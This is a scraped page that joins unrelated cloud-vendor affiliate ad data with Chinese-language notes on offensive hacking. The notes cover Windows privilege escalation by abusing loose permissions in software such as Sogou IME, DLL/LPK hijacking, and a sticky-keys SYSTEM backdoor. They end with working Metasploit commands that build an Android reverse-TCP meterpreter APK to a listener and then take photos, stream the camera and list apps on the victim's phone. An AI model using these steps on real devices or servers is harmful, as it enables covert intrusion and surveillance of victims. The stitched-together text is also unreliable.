[{"createTime":1735734952000,"id":1,"img":"hwy_ms_500_252.jpeg","link":"https://activity.huaweicloud.com/cps.html?fromacct=261f35b6-af54-4511-a2ca-910fa15905d1&utm_source=V1g3MDY4NTY=&utm_medium=cps&utm_campaign=201905","name":"华为云秒杀","status":9,"txt":"华为云38元秒杀","type":1,"updateTime":1735747411000,"userId":3},{"createTime":1736173885000,"id":2,"img":"txy_480_300.png","link":"https://cloud.tencent.com/act/cps/redirect?redirect=1077&cps_key=edb15096bfff75effaaa8c8bb66138bd&from=console","name":"腾讯云秒杀","status":9,"txt":"腾讯云限量秒杀","type":1,"updateTime":1736173885000,"userId":3},{"createTime":1736177492000,"id":3,"img":"aly_251_140.png","link":"https://www.aliyun.com/minisite/goods?userCode=pwp8kmv3","memo":"","name":"阿里云","status":9,"txt":"阿里云2折起","type":1,"updateTime":1736177492000,"userId":3},{"createTime":1735660800000,"id":4,"img":"vultr_560_300.png","link":"https://www.vultr.com/?ref=9603742-8H","name":"Vultr","status":9,"txt":"Vultr送$100","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":5,"img":"jdy_663_320.jpg","link":"https://3.cn/2ay1-e5t","name":"京东云","status":9,"txt":"京东云特惠专区","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":6,"img":"new_ads.png","link":"https://www.iodraw.com/ads","name":"发布广告","status":9,"txt":"发布广告","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":7,"img":"yun_910_50.png","link":"https://activity.huaweicloud.com/discount_area_v5/index.html?fromacct=261f35b6-af54-4511-a2ca-910fa15905d1&utm_source=aXhpYW95YW5nOA===&utm_medium=cps&utm_campaign=201905","name":"底部","status":9,"txt":"高性能云服务器2折起","type":2,"updateTime":1735660800000,"userId":3}]
<>第三方提权
可以进入注册表查看装了哪些软件
<>搜狗输入法提权
原理:通过搜狗输入法的权限不严格,在默认安装搜狗输入法时,权限赋予过大,everyone(所有)权限(绝对控制)
通过伪造exe文件,例如更新程序,在对方进行软件更新或内容更新时,自动执行提前写好的bat脚本(quick batch)
FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法
<>LPK劫持(dll劫持)
一种是需要程序本身的dll,根据函数仿制一个dll
另一种是直接生成一个恶意dll,放在某一个目录下,对方重启程序后生效
前置条件:对方经常使用此软件(要重启软件),对方开远程桌面(端口可能被修改,在shell里看一下即可)
后门生效后,远控连接对方服务器,在登录界面5次shift键调用粘贴后输入提前设置好的命令,验证密码后弹出一个类似控制面板,可以对服务器进行操作,且cmd权限为system
<>对安卓手机渗透测试
kali中msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R >
shell.apk
生成后可以在Android Killer中做处理
软件名称
在msf中设置payload
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.105
set LPORT 4444
run
拍照:webcam_snap
开摄像头:webcam_stream -i 1
查看安装的app:app_list
?